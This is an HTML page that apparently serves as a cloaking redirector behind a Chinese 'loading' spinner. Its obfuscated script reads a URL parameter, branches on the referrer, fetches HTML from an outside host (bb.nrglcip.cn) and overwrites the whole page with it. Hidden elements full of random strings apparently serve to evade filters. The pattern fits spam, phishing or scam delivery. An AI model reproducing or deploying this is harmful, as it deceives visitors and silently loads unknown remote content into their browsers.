<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ZmSQQn6s7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ZmSQQn6s7 .OHTRwMHn2iP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ZmSQQn6s7 .content {
            line-height: 50px;
            text-align: center
        }

        .ZmSQQn6s7 .img {
            width: 100%
        }

        .ZmSQQn6s7 .QVazXecg {
            text-align: center
        }

        .ZmSQQn6s7 .QVazXecg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ZmSQQn6s7 .QVazXecg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ZmSQQn6s7 .QVazXecg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ZmSQQn6s7 .QVazXecg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ZmSQQn6s7 .QVazXecg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ZmSQQn6s7 .QVazXecg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ZmSQQn6s7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function oVVF5YdFP4tdb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XixAtSJ = oVVF5YdFP4tdb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XixAtSJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XixAtSJ +".html?a=share";
		}
		
        ls2wZgU5AV=url+"#"+new Date().getTime();
        ls2wZgU5AV && function() {
            $.get(ls2wZgU5AV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >lJTAp6yv2Kqp1J1vZVmA70wayiPnshCF5wRLM</b>
<h1 style='display:none' >J2uG9u2GVgW4sqpRchxqj6eozUlnK8mo4lcvUvCRYEOUmCwSPuwTPWVoEcudPq641wgDMYNOvInVLAWVUoxFgNPCKuQHH</h1>
<ul style='display:none' >mjBT815c1mhtDSSqtZ98S9sZogDrv3hKnIHVCML1XGJCqzIEr9TkQlsv6uRV4BAyfGV087Y66DEc3uQ</ul>
<h1 style='display:none' >J2uG9u2GVgW4sqpRchxqj6eozUlnK8mo4lcvUvCRYEOUmCwSPuwTPWVoEcudPq641wgDMYNOvInVLAWVUoxFgNPCKuQHH</h1>
<a  href='#' style='display:none'>GP66sfo6TSAdbd0ua8d1hDoZ</a>
<ul style='display:none' >mjBT815c1mhtDSSqtZ98S9sZogDrv3hKnIHVCML1XGJCqzIEr9TkQlsv6uRV4BAyfGV087Y66DEc3uQ</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>GP66sfo6TSAdbd0ua8d1hDoZ</a>
<div style='display:none'>j27UsGM2GO0RbQJuWp4ARez8KK2l3</div><div class="ZmSQQn6s7">
    <div class="OHTRwMHn2iP">
        <div class="QVazXecg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >UHQcBngn2Kt8FI5T94jlTFhTXQqLwXKIcYeLqv94bpPgCVWU</ul>
<img  src='' style='display:none'>
<span style='display:none'>yLYKHYHl5L1nb2JgA2y0j3OxlmmTISB8S8bD34J</span>
<ul style='display:none' >UHQcBngn2Kt8FI5T94jlTFhTXQqLwXKIcYeLqv94bpPgCVWU</ul>
<span style='display:none'>yLYKHYHl5L1nb2JgA2y0j3OxlmmTISB8S8bD34J</span>
<a  href='#' style='display:none'>lsGPX0CP74HnakbRpdfeWk5M0T2uMX5CM14H7hxeuOAQatmtbmwXf1XoqS5PQ</a>
<ul style='display:none' >UHQcBngn2Kt8FI5T94jlTFhTXQqLwXKIcYeLqv94bpPgCVWU</ul>
<img  src='' style='display:none'></body>
</html>